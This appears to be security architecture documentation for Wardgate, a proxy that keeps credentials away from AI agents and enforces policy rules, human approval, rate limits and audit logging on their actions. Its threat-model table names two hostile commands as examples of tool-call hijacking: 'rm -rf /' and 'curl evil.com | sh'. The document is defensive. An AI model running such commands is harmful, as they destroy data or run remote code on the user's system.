Wardgate Security Architecture

This document explains how Wardgate protects your credentials and controls AI agent access to external services.

Overview

Wardgate is a security proxy that sits between AI agents and external services. It provides:

Credential Isolation - Agents never see real credentials
Access Control - Fine-grained rules for what agents can do
Conclaves - Isolated remote execution environments for agent tool calls
Audit Logging - Complete record of all agent activity
Approval Workflows - Human-in-the-loop for sensitive operations
Rate Limiting - Prevent runaway or abusive behavior

Threat Model

What We Protect Against

Threat	How Wardgate Helps
Credential exposure in prompts	Credentials never reach the agent
Prompt injection attacks	Agent can only perform allowed actions
Rogue agent behavior	All requests logged and rate-limited
Data exfiltration	Policies restrict what data can be accessed
Sensitive data in responses	Response filtering blocks or redacts OTP codes, API keys, and similar secrets, including in SSE streams
Accidental destructive actions	Sensitive operations require approval or are blocked outright
SSRF via dynamic upstreams	Agent-provided upstream URLs validated against allowlist with scheme, host, and path checks
Tool call hijacking (e.g., `rm -rf /`, `curl evil.com | sh`)	Conclaves isolate execution and evaluate each command against policy

What We Don't Protect Against

Compromised Wardgate server / host (credentials live here)
Malicious configuration (garbage in, garbage out)
Side-channel attacks on the gateway itself
Social engineering of human approvers

Security Principles

1. Defense in Depth

Multiple layers protect your credentials:

┌─────────────────────────────────────────────────┐
│  Agent Environment                              │
│  • No credentials                               │
│  • Can only reach Wardgate                      │
└────────────────────┬────────────────────────────┘
                     │ Agent authenticates with its own key
                     ▼
┌─────────────────────────────────────────────────┐
│  Wardgate                                       │
│  • Validates agent identity                     │
│  • Evaluates policy rules                       │
│  • Rate limits requests                         │
│  • Validates dynamic upstream targets           │
│  • Filters sensitive data from responses/SSE    │
│  • Logs everything                              │
└────────────────────┬────────────────────────────┘
                     │ Wardgate injects real credentials
                     ▼
┌─────────────────────────────────────────────────┐
│  External Service (Todoist, Gmail, etc.)        │
└─────────────────────────────────────────────────┘

2. Least Privilege

Agents only get access to what they need:

Define specific endpoints (not "all APIs")
Restrict methods (GET only, no DELETE)
Limit paths (only /tasks, not /admin)
Time-bound access (business hours only)
Dynamic upstreams limited to allowlisted host patterns
Response filtering removes sensitive data before it reaches the agent
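
The allowlist restriction on dynamic upstreams can be pictured as a check like the one below. This is a minimal Python sketch, not Wardgate's implementation: the function name `is_upstream_allowed`, the HTTPS-only rule, the rejection of embedded credentials, and the use of `fnmatch`-style globs on the host are all assumptions made for illustration. Path checks are omitted.

```python
from fnmatch import fnmatchcase
from urllib.parse import urlsplit


def is_upstream_allowed(url, allowed_hosts):
    """Return True only if url is HTTPS and its host matches an allowlisted glob.

    Hypothetical helper: the name and the exact checks are illustrative.
    """
    parts = urlsplit(url)
    # Scheme check: reject plain HTTP, file://, and anything else.
    if parts.scheme != "https":
        return False
    # Host check: urlsplit lowercases the hostname and returns None if absent.
    host = parts.hostname
    if not host:
        return False
    # Reject embedded credentials such as https://user:pw@host/.
    if parts.username is not None or parts.password is not None:
        return False
    return any(fnmatchcase(host, pattern) for pattern in allowed_hosts)
```

Matching against the parsed hostname rather than the raw URL string means a lookalike such as `api.todoist.com.evil.com` does not satisfy a `*.todoist.com` pattern.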

3. Explicit Over Implicit

Nothing happens automatically:

Agents must explicitly use Wardgate
Default policy is deny
Sensitive actions require human approval
All decisions are logged

4. Credential Separation

Credentials stay on the gateway and are never sent to agents:

Stored in environment variables on gateway only
Injected into requests at the last moment
Never included in logs or error messages
Never exposed via any API
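
To make "injected at the last moment" concrete, here is a small Python sketch of the header swap. It assumes the upstream expects a Bearer token in the `Authorization` header, as in the Todoist example in this document; the function name `build_upstream_headers` is hypothetical.

```python
import os


def build_upstream_headers(agent_headers, cred_env_var):
    """Swap the agent's own key for the real credential just before forwarding."""
    # Drop the agent's Authorization header so its key never reaches the upstream.
    headers = {k: v for k, v in agent_headers.items() if k.lower() != "authorization"}
    # Read the secret on the gateway only; it is never returned to the agent.
    headers["Authorization"] = "Bearer " + os.environ[cred_env_var]
    return headers
```

The returned dictionary is used only for the outbound request; nothing in it is echoed back to the agent or written to logs.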

Architecture Components

Request Flow

1. Agent sends request to Wardgate
   ┌─────────────────────────────────────────────┐
   │ GET /todoist-api/tasks                      │
   │ Authorization: Bearer <agent-key>           │
   └─────────────────────────────────────────────┘

2. Wardgate validates agent identity
   ┌─────────────────────────────────────────────┐
   │ Is this a valid agent key? ──► Yes          │
   └─────────────────────────────────────────────┘

3. Wardgate evaluates policy rules
   ┌─────────────────────────────────────────────┐
   │ Rule 1: GET /tasks* → allow    ──► Match!   │
   │ Rule 2: DELETE → deny                       │
   │ Rule 3: * → ask                             │
   └─────────────────────────────────────────────┘

4. Check rate limits
   ┌─────────────────────────────────────────────┐
   │ Agent has made 5/100 requests this minute   │
   │ ──► Under limit, proceed                    │
   └─────────────────────────────────────────────┘

5. Resolve upstream target
   ┌─────────────────────────────────────────────┐
   │ Static upstream from config?       ──► Yes  │
   │ Or: X-Wardgate-Upstream header?             │
   │   Validate against allowed_upstreams globs  │
   └─────────────────────────────────────────────┘

6. Inject credentials and forward
   ┌─────────────────────────────────────────────┐
   │ GET https://api.todoist.com/rest/v2/tasks   │
   │ Authorization: Bearer <real-api-key>        │
   └─────────────────────────────────────────────┘

7. Filter response and return
   ┌─────────────────────────────────────────────┐
   │ Scan for sensitive data (OTPs, API keys)    │
   │ SSE streams: filter per-message in realtime │
   │ Action: block, redact, or pass through      │
   └─────────────────────────────────────────────┘

8. Log
   ┌─────────────────────────────────────────────┐
   │ Log: agent=myagent endpoint=todoist-api     │
   │       method=GET path=/tasks decision=allow │
   │       status=200 duration=145ms             │
   └─────────────────────────────────────────────┘
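
Step 7 (response filtering) might look roughly like the following Python sketch. The two regular expressions and the `sk_` key prefix are invented for illustration and are not Wardgate's actual detection rules; only the three actions (block, redact, pass through) come from the flow above.

```python
import re
from typing import Optional

# Hypothetical detection patterns; a real deployment would tune these.
PATTERNS = {
    "otp": re.compile(r"\b\d{6}\b"),
    "api_key": re.compile(r"\bsk_[A-Za-z0-9]{16,}\b"),
}


def filter_response(body: str, action: str = "redact") -> Optional[str]:
    """Apply block / redact / pass to a response body or a single SSE message."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(body)]
    if not hits or action == "pass":
        return body
    if action == "block":
        return None  # the caller would send an error to the agent instead
    for name in hits:
        body = PATTERNS[name].sub("[REDACTED:" + name + "]", body)
    return body
```

For an SSE stream, the same function would be called once per message as it arrives, so the stream is not buffered in full before filtering.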

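Policy Engine

The policy engine evaluates rules in order, top to bottom, and applies the first rule that matches; later rules are not consulted. If no rule matches, the default policy (deny) applies.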

rules:
  - match: { method: GET, path: "/tasks*" }
    action: allow
    rate_limit: { max: 100, window: "1m" }

  - match: { method: POST, path: "/tasks" }
    action: allow
    time_range:
      hours: ["09:00-17:00"]
      days: ["mon", "tue", "wed", "thu", "fri"]

  - match: { method: DELETE }
    action: deny
    message: "Deletion not permitted"

  - match: { method: "*" }
    action: ask
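
First-match-wins evaluation can be sketched in a few lines of Python. This is an illustration under stated assumptions, not the engine itself: `evaluate` is a hypothetical name, path patterns are treated as `fnmatch`-style globs, and `rate_limit` and `time_range` conditions are left out.

```python
from fnmatch import fnmatchcase

# A trimmed version of a rule list, expressed as Python data.
RULES = [
    {"match": {"method": "GET", "path": "/tasks*"}, "action": "allow"},
    {"match": {"method": "DELETE"}, "action": "deny"},
    {"match": {"method": "*"}, "action": "ask"},
]


def evaluate(rules, method, path):
    """Return the action of the first matching rule, or deny if none match."""
    for rule in rules:
        match = rule["match"]
        # A missing field behaves like a wildcard.
        method_ok = match.get("method", "*") in ("*", method)
        path_ok = fnmatchcase(path, match.get("path", "*"))
        if method_ok and path_ok:
            return rule["action"]
    return "deny"  # default policy is deny
```

Because evaluation stops at the first match, `DELETE /tasks/123` is denied by the second rule and never reaches the catch-all `ask` rule.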

Credential Vault

Credentials are stored in environment variables:

# .env file (on gateway only, never shared with agents)
WARDGATE_CRED_TODOIST_API_KEY=abc123...
WARDGATE_CRED_GOOGLE_OAUTH_TOKEN=xyz789...

The vault:

- Reads credentials from environment at startup
- Never exposes credentials via any API
- Logs credential access (not values) for audit
- Supports credential rotation without restart
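
A vault with these properties could be modeled as below. This Python sketch is hypothetical: the class name `CredentialVault` and its methods are assumptions, and only the `WARDGATE_CRED_` prefix is taken from the example above. Rotation without restart is not shown.

```python
import os

PREFIX = "WARDGATE_CRED_"


class CredentialVault:
    """Holds secrets read from the environment and records which ones are used."""

    def __init__(self, environ=None):
        env = os.environ if environ is None else environ
        # Snapshot matching variables once at startup, keyed without the prefix.
        self._secrets = {k[len(PREFIX):]: v for k, v in env.items() if k.startswith(PREFIX)}
        self.access_log = []

    def get(self, name):
        # Record which credential was used, never its value.
        self.access_log.append(name)
        return self._secrets[name]

    def __repr__(self):
        # Show names only, so debug output and tracebacks do not leak values.
        return "CredentialVault(names=%r)" % sorted(self._secrets)
```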

Audit Logging

Every request is logged as structured JSON:

{
  "ts": "2026-02-03T10:30:00Z",
  "request_id": "req_abc123",
  "agent": "my-agent",
  "endpoint": "todoist-api",
  "method": "GET",
  "path": "/tasks",
  "decision": "allow",
  "upstream_status": 200,
  "duration_ms": 145
}

Logs capture:

- Who (agent ID)
- What (method, path, endpoint)
- When (timestamp)
- Decision (allow/deny/ask)
- Outcome (upstream status, duration)

Logs do NOT capture:

- Request/response bodies (privacy)
- Credential values
- Sensitive headers
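
One way to guarantee that bodies and headers stay out of the log is to build each record from metadata only. The Python sketch below shows the idea; the function name `audit_entry` is hypothetical, and the field names mirror the JSON example above.

```python
import json
from datetime import datetime, timezone


def audit_entry(request_id, agent, endpoint, method, path, decision,
                upstream_status, duration_ms):
    """Serialize one audit record as a JSON line.

    The function accepts metadata only, so request/response bodies,
    headers, and credential values are never passed in.
    """
    record = {
        "ts": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "request_id": request_id,
        "agent": agent,
        "endpoint": endpoint,
        "method": method,
        "path": path,
        "decision": decision,
        "upstream_status": upstream_status,
        "duration_ms": duration_ms,
    }
    return json.dumps(record)
```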

Approval Workflow

For sensitive operations, Wardgate can require human approval:

1. Agent requests DELETE /tasks/123
2. Policy matches: action: ask
3. Wardgate sends notification (Slack/webhook)
   ┌─────────────────────────────────────────────┐
   │ 🔔 Approval Required                        │
   │                                             │
   │ Agent: my-agent                             │
   │ Action: DELETE /tasks/123                   │
   │ Endpoint: todoist-api                       │
   │                                             │
   │ [Approve] [Deny]                            │
   └─────────────────────────────────────────────┘
4. Human clicks Approve or Deny
5. Wardgate continues or blocks the request
6. On timeout → default deny
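
The fail-closed behaviour in steps 4 to 6 can be sketched as follows. This Python example assumes the human's decision arrives on an in-process queue, which is a simplification; a real gateway would receive it through a Slack or webhook callback. The name `await_approval` is hypothetical.

```python
import queue


def await_approval(responses, timeout_s):
    """Wait for a human decision; treat silence or anything unexpected as deny."""
    try:
        answer = responses.get(timeout=timeout_s)
    except queue.Empty:
        return "deny"  # step 6: on timeout, default deny
    # Only an explicit "approve" lets the request continue.
    return "allow" if answer == "approve" else "deny"
```

Mapping every answer other than an explicit approval to deny keeps the workflow safe against malformed or unexpected callbacks.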

Deployment Architecture

Recommended Setup

┌────────────────────────────────────────────────┐
│              Private Network                   │
│                                                │
│   ┌──────────────┐       ┌──────────────┐      │
│   │  Agent VPS   │       │ Gateway VPS  │      │
│   │              │       │              │      │
│   │  • AI Agent  │──────▶│  • Wardgate  │─────▶ Internet
│   │  • No creds  │       │  • Has creds │      │
│   └──────────────┘       └──────────────┘      │
│                                                │
└────────────────────────────────────────────────┘

Network Isolation

Gateway only accessible from private network
Firewall blocks direct internet access from agent
All external traffic must go through gateway
WireGuard or similar VPN for secure communication

Gateway Hardening

Minimal attack surface (single binary)
No agent code runs on gateway
Credentials encrypted at rest
Regular security updates

Best Practices

1. Use a Separate Host

Run the gateway on a different host from the agent, as in the Recommended Setup diagram above. This is the simplest way to keep the agent away from the credentials stored on the gateway.

2. Start Restrictive

Begin with a catch-all deny, then add specific allows above it. Because the first matching rule wins, the catch-all must come last:

rules:
  - match: { method: GET, path: "/tasks" }
    action: allow
  - match: { method: "*" }
    action: deny

3. Use Rate Limits

Prevent runaway agents:

rules:
  - match: { method: GET }
    action: allow
    rate_limit: { max: 100, window: "1m" }
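
A limit such as `max: 100` per `1m` window could be enforced with a fixed-window counter per agent. The Python sketch below is one possible approach, not a description of Wardgate's limiter, which may use a different algorithm (for example a sliding window or token bucket). The class name and the injectable `clock` parameter are assumptions.

```python
import time


class FixedWindowLimiter:
    """Allow at most max_requests per agent within each window of window_s seconds."""

    def __init__(self, max_requests, window_s, clock=time.monotonic):
        self.max_requests = max_requests
        self.window_s = window_s
        self.clock = clock  # injectable so the limiter can be tested without sleeping
        self._windows = {}  # agent -> (window start time, request count)

    def allow(self, agent):
        now = self.clock()
        start, count = self._windows.get(agent, (now, 0))
        if now - start >= self.window_s:
            start, count = now, 0  # window expired: start a new one
        if count >= self.max_requests:
            self._windows[agent] = (start, count)
            return False
        self._windows[agent] = (start, count + 1)
        return True
```

Counters are kept per agent, so one runaway agent exhausting its budget does not block the others.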

4. Require Approval for Writes

Be cautious with state-changing operations:

rules:
  - match: { method: GET }
    action: allow
  - match: { method: POST }
    action: ask
  - match: { method: DELETE }
    action: deny

5. Time-Bound Access

Limit when agents can operate:

rules:
  - match: { method: "*" }
    action: allow
    time_range:
      hours: ["09:00-18:00"]
      days: ["mon", "tue", "wed", "thu", "fri"]
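
How a `time_range` condition is evaluated is not spelled out here, so the following Python sketch rests on assumptions: times are compared in the gateway's local time, the end of each range is exclusive, and ranges do not cross midnight. The function name `in_time_range` is hypothetical.

```python
from datetime import datetime

# Index matches datetime.weekday(): Monday is 0.
DAYS = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]


def in_time_range(now, hours, days):
    """True if now is on an allowed day and inside one of the HH:MM-HH:MM ranges."""
    if DAYS[now.weekday()] not in days:
        return False
    current = now.strftime("%H:%M")
    for span in hours:
        start, end = span.split("-")
        # Zero-padded HH:MM strings compare correctly as text; end is exclusive.
        if start <= current < end:
            return True
    return False
```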

6. Use Conclaves for Tool Calls

Isolate agent command execution in conclaves with per-conclave policy rules:

conclaves:
  code:
    description: "Code repository"
    key_env: WARDGATE_CONCLAVE_CODE_KEY
    rules:
      - match: { command: "rg" }
        action: allow
      - match: { command: "git", args_pattern: "^(status|log|diff)" }
        action: allow
      - match: { command: "*" }
        action: deny

See Conclaves for details.
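
The effect of the conclave rules above can be approximated with the Python sketch below. It is illustrative only: `evaluate_command` is a hypothetical name, and applying `args_pattern` to the space-joined arguments is an assumption about how the pattern is matched. The sketch also assumes the resulting argument vector is executed directly rather than through a shell.

```python
import re
import shlex

# The `code` conclave rules, expressed as Python data.
CODE_RULES = [
    {"match": {"command": "rg"}, "action": "allow"},
    {"match": {"command": "git", "args_pattern": r"^(status|log|diff)"}, "action": "allow"},
    {"match": {"command": "*"}, "action": "deny"},
]


def evaluate_command(rules, command_line):
    """First matching rule wins; unparseable or unmatched commands are denied."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return "deny"  # e.g. unbalanced quotes
    if not argv:
        return "deny"
    command, args = argv[0], " ".join(argv[1:])
    for rule in rules:
        match = rule["match"]
        if match["command"] not in ("*", command):
            continue
        pattern = match.get("args_pattern")
        if pattern is None or re.search(pattern, args):
            return rule["action"]
    return "deny"
```

With these rules `git status` is allowed, while `git push` fails the `args_pattern` check on the second rule and falls through to the catch-all deny.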

7. Monitor Audit Logs

Regularly review agent activity:

- Look for unusual patterns
- Check for denied requests
- Verify approval decisions

Comparison with Alternatives

Approach	Credential Exposure	Access Control	Audit
Direct API access	Agent has full credentials	None	None
Environment variables	Agent sees credentials	None	None
Built-in agent permissions	Agent sees credentials	Yes, but agent-controlled	Varies
Wardgate	Never exposed	Gateway-enforced	Complete

Future Security Enhancements

Anomaly detection (unusual patterns)
Multi-gateway redundancy
Hardware security module (HSM) integration